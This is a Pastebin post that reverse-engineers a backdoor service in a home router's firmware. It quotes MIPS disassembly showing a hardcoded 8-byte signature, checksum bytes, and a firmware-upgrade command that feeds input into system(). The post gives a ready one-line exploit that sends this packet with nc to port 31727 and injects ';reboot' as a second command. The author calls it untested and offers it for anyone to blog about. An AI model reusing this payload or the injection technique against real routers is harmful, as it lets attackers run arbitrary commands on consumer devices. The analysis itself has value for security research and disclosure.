API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Oct 23rd, 2013
78
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.88 KB | None | 0 0
raw download clone embed print report
  1. SOHO routers being hyped to the point of silly IDA workshops, i mean common, really?
  2.  
  3. That stuff is basically kindergarten level of the 90s.
  4.  
  5. If you want some cheap street cred, here goes after 20mins of looking at my home router. Feel free to blog or make a youtube video about it:
  6.  
  7. echo "\xc6\x52\x46\x31\xc8\x9c\xc4\xe2\x00\x00\xff\x00\x00\x02;reboot\x00" | nc router [31727](url=http://seclists.org/nmap-dev/2013/q2/426)
  8.  
  9.  
  10. .text:004011CC move $a0, $s2
  11. .text:004011D0 beq $v0, $s4, loc_4010BC
  12. .text:004011D4 addiu $a2, $fp, 0xD8+var_30
  13. .text:004011D8 la $t9, accept
  14. .text:004011DC nop
  15. .text:004011E0 jalr $t9 ; accept
  16. .text:004011E4 nop
  17. .text:004011E8 lw $gp, 0xD8+var_C8($fp)
  18. .text:004011EC move $s1, $v0
  19. .text:004011F0 move $a3, $zero
  20. .text:004011F4 move $a1, $s3
  21. .text:004011F8 move $a0, $s1
  22. .text:004011FC beq $s1, $s4, loc_4012AC
  23. .text:00401200 li $a2, 0x5DC
  24. .text:00401204 la $t9, recv
  25. .text:00401208 nop
  26. .text:0040120C jalr $t9 ; recv
  27. .text:00401210 nop
  28.  
  29. User name is 8 bytes, "\xc6\x52\x46\x31\xc8\x9c\xc4\xe2":
  30.  
  31. .rodata:00403820 COMM_SIGN: .byte 0xC6 # DATA XREF: dispatch:loc_4014E0o
  32. .rodata:00403820 # send_ack+3Co ...
  33. .rodata:00403821 .byte 0x52 # R
  34. .rodata:00403822 .byte 0x46 # F
  35. .rodata:00403823 .byte 0x31 # 1
  36. .rodata:00403824 .byte 0xC8 # + # DATA XREF: send_ack+64r
  37. .rodata:00403825 .byte 0x9C # £
  38. .rodata:00403826 .byte 0xC4 # -
  39. .rodata:00403827 .byte 0xE2 # G
  40. .text:004014E0 # ---------------------------------------------------------------------------
  41. .text:004014E0
  42. .text:004014E0 loc_4014E0: # CODE XREF: dispatch+30j
  43. .text:004014E0 la $a1, COMM_SIGN
  44. .text:004014E4 move $a0, $s0
  45. .text:004014E8 li $a2, 8
  46. .text:004014EC la $t9, memcmp
  47. .text:004014F0 nop
  48. .text:004014F4 jalr $t9 ; memcmp
  49. .text:004014F8 nop
  50. .text:004014FC lw $gp, 0x30+var_20($sp)
  51. .text:00401500 beqz $v0, loc_40151C
  52. .text:00401504 nop
  53. .text:00401508 la $a0, 0x400000
  54. .text:0040150C nop
  55. .text:00401510 addiu $a0, (aSignatureMisma - 0x400000) # "signature mismatch!!\n"
  56. .text:00401514 b loc_4015F8
  57. .text:00401518 nop
  58.  
  59. Password is a tricky beast:
  60.  
  61. First pass \0 to buf[9] to deal with this wtf:
  62.  
  63. .text:0040151C # ---------------------------------------------------------------------------
  64. .text:0040151C
  65. .text:0040151C loc_40151C: # CODE XREF: dispatch+88j
  66. .text:0040151C lbu $v0, 9($s0)
  67. .text:00401520 nop
  68. .text:00401524 beqz $v0, loc_401554
  69. .text:00401528 li $a0, 0xFF
  70. .text:0040152C lbu $v1, 0xB($s0)
  71. .text:00401530 nop
  72. .text:00401534 addu $v0, $v1
  73. .text:00401538 beq $v0, $a0, loc_401554
  74. .text:0040153C nop
  75. .text:00401540 la $a0, 0x400000
  76. .text:00401544 nop
  77. .text:00401548 addiu $a0, (aIsnTRequestCom - 0x400000) # "Isn't REQUEST command or checksum erro"...
  78. .text:0040154C b loc_4015F8
  79. .text:00401550 nop
  80.  
  81. after which buf[0x8] and buf[0xa] must give 0xff in sum:
  82.  
  83. .text:00401554 loc_401554: # CODE XREF: dispatch+ACj
  84. .text:00401554 # dispatch+C0j
  85. .text:00401554 lbu $a1, 8($s0)
  86. .text:00401558 lbu $v0, 0xA($s0)
  87. .text:0040155C li $v1, 0xFF
  88. .text:00401560 addu $v0, $a1, $v0
  89. .text:00401564 beq $v0, $v1, loc_401580
  90. .text:00401568 nop
  91. .text:0040156C la $a0, 0x400000
  92. .text:00401570 nop
  93. .text:00401574 addiu $a0, (aCommandChecksu - 0x400000) # "command checksum error!!\n"
  94. .text:00401578 b loc_4015F8
  95. .text:0040157C nop
  96.  
  97. Finally comes the command line, buf[0xc] = 0 for all intents and purposes, buf[0xd] according to _fdata table, function arguments are buf[0xe]...
  98.  
  99. .text:00401580 loc_401580: # CODE XREF: dispatch+ECj
  100. .text:00401580 la $a0, _fdata
  101. .text:00401584 nop
  102. .text:00401588 lbu $v0, (_fdata - 0x10000000)($a0)
  103. .text:0040158C nop
  104. .text:00401590 beqz $v0, loc_401640
  105. .text:00401594 move $s1, $zero
  106. .text:00401598 move $v1, $a0
  107. .text:0040159C addiu $a3, $a0, (off_10000004 - 0x10000000)
  108. .text:004015A0 move $a0, $zero
  109. .text:004015A4 lbu $v0, (_fdata - 0x10000000)($v1)
  110. .text:004015A8
  111. .text:004015A8 loc_4015A8: # CODE XREF: dispatch+1A4j
  112. .text:004015A8 addiu $a0, 8
  113. .text:004015AC bne $v0, $a1, loc_401614
  114. .text:004015B0 addiu $v1, 8
  115. .text:004015B4 lbu $a2, 0xC($s0)
  116. .text:004015B8 lbu $v0, 0xD($s0)
  117. .text:004015BC sll $a2, 8
  118. .text:004015C0 addu $v1, $s1, $a3
  119. .text:004015C4 addu $a2, $v0
  120. .text:004015C8 lw $v0, 0($v1)
  121. .text:004015CC move $a0, $s2
  122. .text:004015D0 addiu $a1, $s0, 0xE
  123. .text:004015D4 move $t9, $v0
  124. .text:004015D8 jalr $t9
  125. .text:004015DC nop
  126. .text:004015E0 lw $gp, 0x30+var_20($sp)
  127. .text:004015E4 bgez $v0, loc_401624
  128. .text:004015E8 nop
  129. .text:004015EC la $a0, 0x400000
  130. .text:004015F0 nop
  131. .text:004015F4 addiu $a0, (aCallFunctionRe - 0x400000) # "call function return error!!\n"
  132. .data:10000000 # Segment type: Pure data
  133. .data:10000000 .data
  134. .data:10000000 .globl _fdata
  135. .data:10000000 _fdata: .word 1 # DATA XREF: dispatch:loc_401580o
  136. .data:10000000 # dispatch+110r ...
  137. .data:10000000 # Alternative name is '_fdata'
  138. .data:10000000 # command
  139. .data:10000004 off_10000004: .word get_info # DATA XREF: dispatch+124o
  140. .data:10000008 .word 2
  141. .data:1000000C .word write_id
  142. .data:10000010 .word 4
  143. .data:10000014 .word upgrade_fw
  144. .data:10000018 .word 6
  145. .data:1000001C .word set_domain
  146. .data:10000020 .word 0
  147. .data:10000024 .word 0
  148. .data:10000028 .align 4
  149.  
  150. Of course, we'd like to update firmware:
  151.  
  152. .text:00401D94 .globl upgrade_fw
  153. .text:00401D94 upgrade_fw: # DATA XREF: .data:10000014o
  154. .text:00401D94 # .got:upgrade_fw_ptro
  155. .text:00401D94
  156. .text:00401D94 var_90 = -0x90
  157. .text:00401D94 var_8C = -0x8C
  158. .text:00401D94 var_88 = -0x88
  159. .text:00401D94 var_80 = -0x80
  160. .text:00401D94 var_78 = -0x78
  161. .text:00401D94 var_10 = -0x10
  162. .text:00401D94 var_C = -0xC
  163. .text:00401D94 var_8 = -8
  164. .text:00401D94 var_4 = -4
  165. .text:00401D94
  166. .text:00401D94 li $gp, 0xFC0629C
  167. .text:00401D9C addu $gp, $t9
  168. .text:00401DA0 addiu $sp, -0xA0
  169. .text:00401DA4 sw $gp, 0xA0+var_80($sp)
  170. .text:00401DA8 la $v0, 0x400000
  171. .text:00401DAC nop
  172. .text:00401DB0 addiu $v0, (aCommandIsUpgra - 0x400000) # "command is UPGRADE_FW\n"
  173. .text:00401DB4 sw $s1, 0xA0+var_C($sp)
  174. .text:00401DB8 sw $s0, 0xA0+var_10($sp)
  175. .text:00401DBC move $s1, $a0
  176. .text:00401DC0 move $s0, $a1
  177. .text:00401DC4 move $a0, $v0
  178. .text:00401DC8 sw $ra, 0xA0+var_4($sp)
  179. .text:00401DCC sw $gp, 0xA0+var_8($sp)
  180. .text:00401DD0 la $t9, printf
  181. .text:00401DD4 nop
  182. .text:00401DD8 jalr $t9 ; printf
  183. .text:00401DDC nop
  184. .text:00401DE0 lw $gp, 0xA0+var_80($sp)
  185. .text:00401DE4 lbu $a2, 0($s0)
  186. .text:00401DE8 lbu $a3, 1($s0)
  187. .text:00401DEC lbu $v1, 3($s0)
  188. .text:00401DF0 lbu $v0, 2($s0)
  189. .text:00401DF4 addiu $a0, $sp, 0xA0+var_78
  190. .text:00401DF8 la $a1, 0x400000
  191. .text:00401DFC nop
  192. .text:00401E00 addiu $a1, (aTftpGwGetD_D_D - 0x400000) # "tftp gw get %d.%d.%d.%d:/%s"
  193. .text:00401E04 addiu $s0, 4
  194. .text:00401E08 sw $s0, 0xA0+var_88($sp)
  195. .text:00401E0C sw $v0, 0xA0+var_90($sp)
  196. .text:00401E10 sw $v1, 0xA0+var_8C($sp)
  197. .text:00401E14 la $t9, sprintf
  198. .text:00401E18 nop
  199. .text:00401E1C jalr $t9 ; sprintf
  200. .text:00401E20 nop
  201. .text:00401E24 lw $gp, 0xA0+var_80($sp)
  202. .text:00401E28 addiu $a1, $sp, 0xA0+var_78
  203. .text:00401E2C la $a0, 0x400000
  204. .text:00401E30 nop
  205. .text:00401E34 addiu $a0, (aUseCommandS - 0x400000) # "use command '%s'\n"
  206. .text:00401E38 la $t9, printf
  207. .text:00401E3C nop
  208. .text:00401E40 jalr $t9 ; printf
  209. .text:00401E44 nop
  210. .text:00401E48 lw $gp, 0xA0+var_80($sp)
  211. .text:00401E4C addiu $a0, $sp, 0xA0+var_78
  212. .text:00401E50 la $t9, system
  213. .text:00401E54 nop
  214. .text:00401E58 jalr $t9 ; system
  215.  
  216. Well thank you. The final "exploit", or is it shellcode would be something along the lines of "\xc6\x52\x46\x31\xc8\x9c\xc4\xe2\x00\x00\xff\x00\x00\x02;reboot\x00" but didn't test it. I'm too lazy to ruin my openwrt on my BR-6104K.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!